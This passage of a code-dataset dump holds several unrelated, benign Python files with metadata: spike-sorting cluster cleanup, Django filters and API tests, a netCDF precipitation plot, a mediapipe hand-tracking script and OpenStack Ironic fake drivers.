np.unique(pop_from_cluster):\n #~ cc.pop_labels_from_cluster([k])\n pop_from_cluster = np.unique(pop_from_cluster)\n cc.pop_labels_from_cluster(pop_from_cluster)\n \n new_centroids = np.unique(new_centroids)\n new_centroids = [k for k in new_centroids if k not in pop_from_cluster]\n cc.compute_several_centroids(new_centroids)\n\n #~ cc.compute_one_centroid(k)\n \n \n \n #~ for k in np.unique(pop_from_centroids):\n #~ if k in centroids:\n #~ centroids.pop(k)\n \n #~ print('nb_merge', nb_merge)\n if nb_merge == 0:\n break\n\n\ndef trash_low_extremum(cc, 
min_extremum_amplitude=None):\n if min_extremum_amplitude is None:\n threshold = cc.info['peak_detector_params']['relative_threshold']\n min_extremum_amplitude = threshold + 0.5\n \n to_remove = []\n for k in list(cc.positive_cluster_labels):\n #~ print(k)\n ind = cc.index_of_label(k)\n assert k == cc.clusters[ind]['cluster_label'], 'this is a bug in trash_low_extremum'\n \n extremum_amplitude = np.abs(cc.clusters[ind]['extremum_amplitude'])\n #~ print('k', k , extremum_amplitude)\n if extremum_amplitude < min_extremum_amplitude:\n if debug_plot:\n print('k', k , extremum_amplitude, 'too small')\n \n mask = cc.all_peaks['cluster_label']==k\n cc.all_peaks['cluster_label'][mask] = -1\n to_remove.append(k)\n cc.pop_labels_from_cluster(to_remove)\n\n\ndef trash_small_cluster(cc, minimum_size=10):\n to_remove = []\n for k in list(cc.positive_cluster_labels):\n mask = cc.all_peaks['cluster_label']==k\n cluster_size = np.sum(mask)\n #~ print(k, cluster_size)\n if cluster_size <= minimum_size :\n cc.all_peaks['cluster_label'][mask] = -1\n to_remove.append(k)\n cc.pop_labels_from_cluster(to_remove)\n", "sub_path": "tridesclous/cleancluster.py", "file_name": "cleancluster.py", "file_ext": "py", "file_size_in_byte": 17950, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.nonzero", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 41, "usage_type": "attribute"}, {"api_name": "numpy.median", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 58, "usage_type": "call"}, {"api_name": "dataio.DataIO", "line_number": 74, "usage_type": "call"}, {"api_name": "catalogueconstructor.CatalogueConstructor", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.nonzero", "line_number": 89, "usage_type": "call"}, {"api_name": "sklearn.decomposition.TruncatedSVD", "line_number": 99, "usage_type": "call"}, {"api_name": "sklearn.decomposition", "line_number": 99, "usage_type": "attribute"}, {"api_name": "dip.diptest", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.nonzero", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 140, "usage_type": "call"}, {"api_name": "joblib.Parallel", "line_number": 155, "usage_type": "call"}, {"api_name": "joblib.delayed", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.nonzero", "line_number": 160, "usage_type": "call"}, {"api_name": "sklearn.decomposition.TruncatedSVD", "line_number": 170, "usage_type": "call"}, {"api_name": "sklearn.decomposition", "line_number": 170, "usage_type": "attribute"}, {"api_name": "hdbscan.HDBSCAN", "line_number": 173, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 175, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 179, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 185, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 185, "usage_type": "name"}, 
{"api_name": "numpy.median", "line_number": 186, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 191, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 191, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 225, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 225, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm.get_cmap", "line_number": 226, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 226, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 226, "usage_type": "name"}, {"api_name": "numpy.median", "line_number": 250, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 269, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 269, "usage_type": "name"}, {"api_name": "numpy.unique", "line_number": 275, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 277, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 280, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 280, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 281, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 283, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 283, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 284, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 286, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 289, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 304, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 304, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 305, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 308, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 308, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 309, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 312, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 319, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 319, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 325, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 325, "usage_type": "name"}, {"api_name": "numpy.abs", "line_number": 376, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 380, "usage_type": "call"}, {"api_name": "waveformtools.equal_template", "line_number": 388, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 428, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 428, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 432, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 432, "usage_type": "name"}, {"api_name": "numpy.unique", "line_number": 436, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 439, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 467, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 483, "usage_type": "call"}]} +{"seq_id": "586466355", "text": "from autho.models import User, EmployeeProfile\nfrom django.contrib.contenttypes.models import ContentType\nfrom django_filters import rest_framework as filters\n\n\nclass UserListFilter(filters.FilterSet):\n\n class Meta:\n model = User\n fields = ['phone_number', 'username', 
'email']\n\n @property\n def qs(self):\n parent = super(UserListFilter, self).qs\n content_type = ContentType.objects.get_for_model(EmployeeProfile)\n user = getattr(self.request, 'user', None)\n owner = None\n if user:\n owner = user.owner if user.owner else user\n return parent.filter(owner=owner, content_type=content_type)\n\n\nclass EmployeeListFilter(filters.FilterSet):\n\n class Meta:\n model = EmployeeProfile\n fields = ['supervisor']\n\n @property\n def qs(self):\n parent = super(EmployeeListFilter, self).qs\n user = getattr(self.request, 'user', None)\n owner = None\n if user:\n owner = user.owner if user.owner else user\n return parent.filter(user__owner=owner).distinct()\n", "sub_path": "app/autho/filters.py", "file_name": "filters.py", "file_ext": "py", "file_size_in_byte": 1079, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django_filters.rest_framework.FilterSet", "line_number": 6, "usage_type": "attribute"}, {"api_name": "django_filters.rest_framework", "line_number": 6, "usage_type": "name"}, {"api_name": "autho.models.User", "line_number": 9, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.models.ContentType.objects.get_for_model", "line_number": 15, "usage_type": "call"}, {"api_name": "autho.models.EmployeeProfile", "line_number": 15, "usage_type": "argument"}, {"api_name": "django.contrib.contenttypes.models.ContentType.objects", "line_number": 15, "usage_type": "attribute"}, {"api_name": "django.contrib.contenttypes.models.ContentType", "line_number": 15, "usage_type": "name"}, {"api_name": "django_filters.rest_framework.FilterSet", "line_number": 23, "usage_type": "attribute"}, {"api_name": "django_filters.rest_framework", "line_number": 23, "usage_type": "name"}, {"api_name": "autho.models.EmployeeProfile", "line_number": 26, "usage_type": "name"}]} +{"seq_id": "89159068", "text": "import json\n\nfrom django.test import TestCase\nfrom model_mommy import mommy\nfrom rest_framework import status\nfrom rest_framework.reverse import reverse\n\nfrom phonebillsapi.bill.models import Tariff\n\n\nclass TestTariffView(TestCase):\n def setUp(self):\n self.url_list = reverse('api:tariff-list')\n self.data = {\n \"tariff_time\": \"standard\",\n \"standing_charge\": \"0.36\",\n \"call_charge\": \"0.09\",\n \"interval_start\": \"06:00:00\",\n \"interval_end\": \"22:00:00\"\n }\n\n def test_insert_tariff(self):\n response = self.client.post(self.url_list, data=json.dumps(self.data), content_type='application/json')\n\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n def test_get_all_tariffs(self):\n mommy.make(Tariff)\n mommy.make(Tariff)\n\n response = self.client.get(self.url_list)\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(len(response.json()), 2)\n\n def test_get_specific_tariff(self):\n mommy.make(Tariff, id=10, **self.data)\n url_detail = reverse('api:tariff-detail', args=[10])\n\n response = self.client.get(url_detail)\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.json()['id'], 10)\n\n def test_update_tariff(self):\n mommy.make(Tariff, id=10, **self.data)\n url_detail = reverse('api:tariff-detail', args=[10])\n\n new_data = {\n \"tariff_time\": \"standard\",\n \"standing_charge\": \"0.36\",\n \"call_charge\": \"0.08\",\n \"interval_start\": \"06:00:00\",\n \"interval_end\": \"22:00:00\"\n }\n\n response = self.client.put(url_detail, data=json.dumps(new_data), 
content_type='application/json')\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.json()['call_charge'], new_data['call_charge'])\n", "sub_path": "phonebillsapi/api/tests/views/test_tariff_view.py", "file_name": "test_tariff_view.py", "file_ext": "py", "file_size_in_byte": 1955, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.test.TestCase", "line_number": 11, "usage_type": "name"}, {"api_name": "rest_framework.reverse.reverse", "line_number": 13, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 23, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 25, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 25, "usage_type": "name"}, {"api_name": "model_mommy.mommy.make", "line_number": 28, "usage_type": "call"}, {"api_name": "phonebillsapi.bill.models.Tariff", "line_number": 28, "usage_type": "argument"}, {"api_name": "model_mommy.mommy", "line_number": 28, "usage_type": "name"}, {"api_name": "model_mommy.mommy.make", "line_number": 29, "usage_type": "call"}, {"api_name": "phonebillsapi.bill.models.Tariff", "line_number": 29, "usage_type": "argument"}, {"api_name": "model_mommy.mommy", "line_number": 29, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 33, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 33, "usage_type": "name"}, {"api_name": "model_mommy.mommy.make", "line_number": 37, "usage_type": "call"}, {"api_name": "phonebillsapi.bill.models.Tariff", "line_number": 37, "usage_type": "argument"}, {"api_name": "model_mommy.mommy", "line_number": 37, "usage_type": "name"}, {"api_name": "rest_framework.reverse.reverse", "line_number": 38, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 42, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 42, "usage_type": "name"}, {"api_name": "model_mommy.mommy.make", "line_number": 46, "usage_type": "call"}, {"api_name": "phonebillsapi.bill.models.Tariff", "line_number": 46, "usage_type": "argument"}, {"api_name": "model_mommy.mommy", "line_number": 46, "usage_type": "name"}, {"api_name": "rest_framework.reverse.reverse", "line_number": 47, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 57, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 59, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 59, "usage_type": "name"}]} +{"seq_id": "589645750", "text": "# coding: utf-8\r\nfrom netCDF4 import Dataset\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom mpl_toolkits.basemap import Basemap\r\n\r\n\r\n\r\ndef plot_nc(lons, lats, precips):\r\n m = Basemap(width=200000, height=200000, projection='stere',\r\n lat_0=lat_0, lon_0=lon_0)\r\n lon, lat = np.meshgrid(lons, lats)\r\n xi, yi = m(lon, lat)\r\n cs = m.pcolor(xi, yi, precips[0])\r\n m.drawstates()\r\n m.drawcounties()\r\n cbar = m.colorbar(cs, location='bottom', pad='10%')\r\n plt.show()\r\n\r\n# get data\r\nn = Dataset('2016102418.nc', 'r+')\r\nlons = n.variables['longitude'][:]\r\nlats = n.variables['latitude'][:]\r\nlat_0 = lats.mean()\r\nlon_0 = lons.mean()\r\nprcips = n.variables['precipitation'][:]\r\nn.close()\r\n\r\n# plot\r\nplot_nc(lons, lats, prcips)\r\n\r\n\r\n", "sub_path": "PhaseI/DataPreparation/plot_nc.py", "file_name": "plot_nc.py", 
"file_ext": "py", "file_size_in_byte": 770, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "mpl_toolkits.basemap.Basemap", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "netCDF4.Dataset", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "190364507", "text": "import cv2\nimport mediapipe as mp\n\nmphands = mp.solutions.hands\nhands = mphands.Hands()\nmp_drawing = mp.solutions.drawing_utils\ncap = cv2.VideoCapture(0)\n\n_, frame = cap.read()\n\nh, w, _ = frame.shape\n\nwhile True:\n _, frame = cap.read()\n framergb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n result = hands.process(framergb)\n hand_landmarks = result.multi_hand_landmarks\n if hand_landmarks:\n for handLMs in hand_landmarks:\n x_max = 0\n y_max = 0\n x_min = w \n y_min = h \n for lm in handLMs.landmark:\n x, y = int(lm.x * w), int(lm.y * h)\n if x > x_max:\n x_max = x\n if x < x_min:\n x_min = x\n if y > y_max:\n y_max = y\n if y < y_min:\n y_min = y\n cv2.rectangle(frame, (x_min - 30, y_min - 30), (x_max + 30 , y_max + 30), (0, 255, 0), 2)\n mp_drawing.draw_landmarks(frame, handLMs, mphands.HAND_CONNECTIONS)\n cv2.imshow(\"Frame\", frame)\n\n cv2.waitKey(1)", "sub_path": "misc/hand_bbox.py", "file_name": "hand_bbox.py", "file_ext": "py", "file_size_in_byte": 1095, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "mediapipe.solutions", "line_number": 4, "usage_type": "attribute"}, {"api_name": "mediapipe.solutions", "line_number": 6, "usage_type": "attribute"}, {"api_name": "cv2.VideoCapture", "line_number": 7, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 15, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 36, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "650921278", "text": "# -*- encoding: utf-8 -*-\n#\n# Copyright 2013 Hewlett-Packard Development Company, L.P.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\"\"\"\nFake drivers used in testing.\n\"\"\"\n\nfrom oslo_utils import importutils\n\nfrom ironic.common import exception\nfrom ironic.common.i18n import _\nfrom ironic.drivers import base\nfrom ironic.drivers.modules import agent\nfrom ironic.drivers.modules.cimc import management as cimc_mgmt\nfrom ironic.drivers.modules.cimc import power as cimc_power\nfrom ironic.drivers.modules.drac import deploy as drac_deploy\nfrom ironic.drivers.modules.drac import inspect as drac_inspect\nfrom ironic.drivers.modules.drac import management as drac_mgmt\nfrom ironic.drivers.modules.drac import power as drac_power\nfrom ironic.drivers.modules.drac import raid as drac_raid\nfrom ironic.drivers.modules.drac import vendor_passthru as drac_vendor\nfrom ironic.drivers.modules import fake\nfrom ironic.drivers.modules.ilo import inspect as ilo_inspect\nfrom ironic.drivers.modules.ilo import management as ilo_management\nfrom ironic.drivers.modules.ilo import power as ilo_power\nfrom ironic.drivers.modules import inspector\nfrom ironic.drivers.modules import ipmitool\nfrom ironic.drivers.modules.irmc import inspect as irmc_inspect\nfrom ironic.drivers.modules.irmc import management as irmc_management\nfrom ironic.drivers.modules.irmc import power as irmc_power\nfrom ironic.drivers.modules import iscsi_deploy\nfrom ironic.drivers.modules.oneview import common as oneview_common\nfrom ironic.drivers.modules.oneview import management as oneview_management\nfrom ironic.drivers.modules.oneview import power as oneview_power\nfrom ironic.drivers.modules import pxe\nfrom ironic.drivers.modules import snmp\nfrom ironic.drivers.modules import ssh\nfrom ironic.drivers.modules.ucs import management as ucs_mgmt\nfrom ironic.drivers.modules.ucs import power as ucs_power\nfrom ironic.drivers import utils\n\n\nclass FakeDriver(base.BaseDriver):\n \"\"\"Example implementation of a Driver.\"\"\"\n\n def __init__(self):\n self.power = fake.FakePower()\n self.deploy = fake.FakeDeploy()\n self.boot = fake.FakeBoot()\n\n self.a = fake.FakeVendorA()\n self.b = fake.FakeVendorB()\n self.mapping = {'first_method': self.a,\n 'second_method': self.b,\n 'third_method_sync': self.b,\n 'fourth_method_shared_lock': self.b}\n self.vendor = utils.MixinVendorInterface(self.mapping)\n self.console = fake.FakeConsole()\n self.management = fake.FakeManagement()\n self.inspect = fake.FakeInspect()\n self.raid = fake.FakeRAID()\n\n\nclass FakeSoftPowerDriver(FakeDriver):\n \"\"\"Example implementation of a Driver.\"\"\"\n\n def __init__(self):\n super(FakeSoftPowerDriver, self).__init__()\n self.power = fake.FakeSoftPower()\n\n\nclass FakeIPMIToolDriver(base.BaseDriver):\n \"\"\"Example implementation of a Driver.\"\"\"\n\n def __init__(self):\n self.power = ipmitool.IPMIPower()\n self.console = ipmitool.IPMIShellinaboxConsole()\n self.deploy = fake.FakeDeploy()\n self.vendor = ipmitool.VendorPassthru()\n self.management = ipmitool.IPMIManagement()\n\n\nclass FakeIPMIToolSocatDriver(base.BaseDriver):\n \"\"\"Example implementation of a Driver.\"\"\"\n\n def __init__(self):\n self.power = ipmitool.IPMIPower()\n self.console = ipmitool.IPMISocatConsole()\n self.deploy = fake.FakeDeploy()\n self.vendor = ipmitool.VendorPassthru()\n self.management = ipmitool.IPMIManagement()\n\n\nclass FakePXEDriver(base.BaseDriver):\n \"\"\"Example implementation of a Driver.\"\"\"\n\n def __init__(self):\n self.power = fake.FakePower()\n self.boot = 
pxe.PXEBoot()\n self.deploy = iscsi_deploy.ISCSIDeploy()\n\n\nclass FakeSSHDriver(base.BaseDriver):\n \"\"\"Example implementation of a Driver.\"\"\"\n\n supported = False\n\n def __init__(self):\n self.power = ssh.SSHPower()\n self.deploy = fake.FakeDeploy()\n self.management = ssh.SSHManagement()\n self.console = ssh.ShellinaboxConsole()\n\n\nclass FakeAgentDriver(base.BaseDriver):\n \"\"\"Example implementation of an AgentDriver.\"\"\"\n\n def __init__(self):\n self.power = fake.FakePower()\n self.boot = pxe.PXEBoot()\n self.deploy = agent.AgentDeploy()\n self.raid = agent.AgentRAID()\n\n\nclass FakeIloDriver(base.BaseDriver):\n \"\"\"Fake iLO driver, used in testing.\"\"\"\n\n def __init__(self):\n if not importutils.try_import('proliantutils'):\n raise exception.DriverLoadError(\n driver=self.__class__.__name__,\n reason=_(\"Unable to import proliantutils library\"))\n self.power = ilo_power.IloPower()\n self.deploy = fake.FakeDeploy()\n self.management = ilo_management.IloManagement()\n self.inspect = ilo_inspect.IloInspect()\n\n\nclass FakeDracDriver(base.BaseDriver):\n \"\"\"Fake Drac driver.\"\"\"\n\n def __init__(self):\n if not importutils.try_import('dracclient'):\n raise exception.DriverLoadError(\n driver=self.__class__.__name__,\n reason=_('Unable to import python-dracclient library'))\n\n self.power = drac_power.DracPower()\n self.deploy = drac_deploy.DracDeploy()\n self.management = drac_mgmt.DracManagement()\n self.raid = drac_raid.DracRAID()\n self.vendor = drac_vendor.DracVendorPassthru()\n self.inspect = drac_inspect.DracInspect()\n\n\nclass FakeSNMPDriver(base.BaseDriver):\n \"\"\"Fake SNMP driver.\"\"\"\n\n def __init__(self):\n if not importutils.try_import('pysnmp'):\n raise exception.DriverLoadError(\n driver=self.__class__.__name__,\n reason=_(\"Unable to import pysnmp library\"))\n self.power = snmp.SNMPPower()\n self.deploy = fake.FakeDeploy()\n\n\nclass FakeIRMCDriver(base.BaseDriver):\n \"\"\"Fake iRMC driver.\"\"\"\n\n def __init__(self):\n if not importutils.try_import('scciclient'):\n raise exception.DriverLoadError(\n driver=self.__class__.__name__,\n reason=_(\"Unable to import python-scciclient library\"))\n self.power = irmc_power.IRMCPower()\n self.deploy = fake.FakeDeploy()\n self.management = irmc_management.IRMCManagement()\n self.inspect = irmc_inspect.IRMCInspect()\n\n\nclass FakeIPMIToolInspectorDriver(base.BaseDriver):\n \"\"\"Fake Inspector driver.\"\"\"\n\n def __init__(self):\n self.power = ipmitool.IPMIPower()\n self.console = ipmitool.IPMIShellinaboxConsole()\n self.deploy = fake.FakeDeploy()\n self.vendor = ipmitool.VendorPassthru()\n self.management = ipmitool.IPMIManagement()\n # NOTE(dtantsur): unlike other uses of Inspector, this one is\n # unconditional, as this driver is designed for testing inspector\n # integration.\n self.inspect = inspector.Inspector()\n\n\nclass FakeUcsDriver(base.BaseDriver):\n \"\"\"Fake UCS driver.\"\"\"\n\n def __init__(self):\n if not importutils.try_import('UcsSdk'):\n raise exception.DriverLoadError(\n driver=self.__class__.__name__,\n reason=_(\"Unable to import UcsSdk library\"))\n self.power = ucs_power.Power()\n self.deploy = fake.FakeDeploy()\n self.management = ucs_mgmt.UcsManagement()\n\n\nclass FakeCIMCDriver(base.BaseDriver):\n \"\"\"Fake CIMC driver.\"\"\"\n\n def __init__(self):\n if not importutils.try_import('ImcSdk'):\n raise exception.DriverLoadError(\n driver=self.__class__.__name__,\n reason=_(\"Unable to import ImcSdk library\"))\n self.power = cimc_power.Power()\n self.deploy = 
fake.FakeDeploy()\n self.management = cimc_mgmt.CIMCManagement()\n\n\nclass FakeOneViewDriver(base.BaseDriver):\n \"\"\"Fake OneView driver. For testing purposes. \"\"\"\n\n def __init__(self):\n if not importutils.try_import('oneview_client.client'):\n raise exception.DriverLoadError(\n driver=self.__class__.__name__,\n reason=_(\"Unable to import python-oneviewclient library\"))\n\n # Checks connectivity to OneView and version compatibility on driver\n # initialization\n oneview_client = oneview_common.get_oneview_client()\n oneview_client.verify_oneview_version()\n oneview_client.verify_credentials()\n self.power = oneview_power.OneViewPower()\n self.management = oneview_management.OneViewManagement()\n self.boot = fake.FakeBoot()\n self.deploy = fake.FakeDeploy()\n self.inspect = fake.FakeInspect()\n", "sub_path": "ironic/drivers/fake.py", "file_name": "fake.py", "file_ext": "py", "file_size_in_byte": 9111, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "ironic.drivers.base.BaseDriver", "line_number": 55, "usage_type": "attribute"}, {"api_name": "ironic.drivers.base", "line_number": 55, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakePower", "line_number": 59, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 59, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeDeploy", "line_number": 60, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 60, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeBoot", "line_number": 61, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 61, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeVendorA", "line_number": 63, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 63, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeVendorB", "line_number": 64, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 64, "usage_type": "name"}, {"api_name": "ironic.drivers.utils.MixinVendorInterface", "line_number": 69, "usage_type": "call"}, {"api_name": "ironic.drivers.utils", "line_number": 69, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeConsole", "line_number": 70, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 70, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeManagement", "line_number": 71, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 71, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeInspect", "line_number": 72, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 72, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeRAID", "line_number": 73, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 73, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeSoftPower", "line_number": 81, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 81, "usage_type": "name"}, {"api_name": "ironic.drivers.base.BaseDriver", "line_number": 84, "usage_type": "attribute"}, {"api_name": "ironic.drivers.base", "line_number": 84, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.ipmitool.IPMIPower", "line_number": 88, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ipmitool", 
"line_number": 88, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.ipmitool.IPMIShellinaboxConsole", "line_number": 89, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ipmitool", "line_number": 89, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeDeploy", "line_number": 90, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 90, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.ipmitool.VendorPassthru", "line_number": 91, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ipmitool", "line_number": 91, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.ipmitool.IPMIManagement", "line_number": 92, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ipmitool", "line_number": 92, "usage_type": "name"}, {"api_name": "ironic.drivers.base.BaseDriver", "line_number": 95, "usage_type": "attribute"}, {"api_name": "ironic.drivers.base", "line_number": 95, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.ipmitool.IPMIPower", "line_number": 99, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ipmitool", "line_number": 99, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.ipmitool.IPMISocatConsole", "line_number": 100, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ipmitool", "line_number": 100, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeDeploy", "line_number": 101, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 101, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.ipmitool.VendorPassthru", "line_number": 102, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ipmitool", "line_number": 102, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.ipmitool.IPMIManagement", "line_number": 103, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ipmitool", "line_number": 103, "usage_type": "name"}, {"api_name": "ironic.drivers.base.BaseDriver", "line_number": 106, "usage_type": "attribute"}, {"api_name": "ironic.drivers.base", "line_number": 106, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakePower", "line_number": 110, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 110, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.pxe.PXEBoot", "line_number": 111, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.pxe", "line_number": 111, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.iscsi_deploy.ISCSIDeploy", "line_number": 112, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.iscsi_deploy", "line_number": 112, "usage_type": "name"}, {"api_name": "ironic.drivers.base.BaseDriver", "line_number": 115, "usage_type": "attribute"}, {"api_name": "ironic.drivers.base", "line_number": 115, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.ssh.SSHPower", "line_number": 121, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ssh", "line_number": 121, "usage_type": "name"}, 